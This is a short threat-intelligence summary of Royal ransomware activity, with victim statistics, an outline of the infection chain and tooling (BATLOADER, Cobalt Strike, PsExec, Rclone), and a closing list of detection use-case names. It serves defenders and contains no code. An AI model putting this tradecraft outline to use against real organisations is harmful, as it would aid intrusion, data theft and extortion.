Royal Ransomware Continues to Spread, With US Organizations Hit Hardest
Category: Ransomware News | Industry: Global | Level: Tactical | Source: Unit 42
Since its emergence in September 2022, the Royal ransomware gang established itself as a clear and proficient threat group. A Unit 42 threat assessment details recent activity and metrics involving the notorious threat group. Unit 42 identified the Royal ransomware as a "private group made up of former members of Conti." The group has not operated or recruited members under a Ransomware-as-a-Service (RaaS) model, unlike other renowned ransomware gangs like LockBit and ALPHV/Blackcat. Royal ransomware has affected a wide range of industries, with the most prominent being manufacturing, wholesale and retail, professional and legal services, education, construction, and healthcare. By country, cases in the United States accounted for "64% of the impacted organizations" measured at 100 cases out of a total of 155. In comparison, second place Canada measured at a distant 13 cases followed by Germany with 11, the United Kingdom with 6, and Brazil with 4 to round off the top five.
Infections from Royal ransomware have observed the abuse of Search engine optimization (SEO) poisoning, in addition to malvertising campaigns to drop malware. Unit 42 observed these lures initiating "a complex infection chain with multiple stages, including PowerShell scripts and MSI files. In certain cases, this leads to infection with BATLOADER." Subsequently, the BATLOADER malware is capable of setting up additional payloads, including Cobalt Strike, batch scripts designed to disable security monitoring, reconnaissance tools like NetScan, and PsExec to aid with lateral movement, information-stealing malware, and system and remote management tools such as NSudo and Syncro. For data exfiltration, Rclone is commonly associated as a tool relied upon by Royal threat actors. The Windows variant of Royal's encryptor is noted not to employ any "anti-analysis tricks or string encryption" based on samples observed, "as of late April." The Royal ransomware gang also incorporates a Linux variant of their encryptor to expand their attack surface.
- Malicious Software Download via MSI/JS
Anvilogic Use Cases:
- Executable Create Script Process
- MSIExec Install MSI File
- Rclone Execution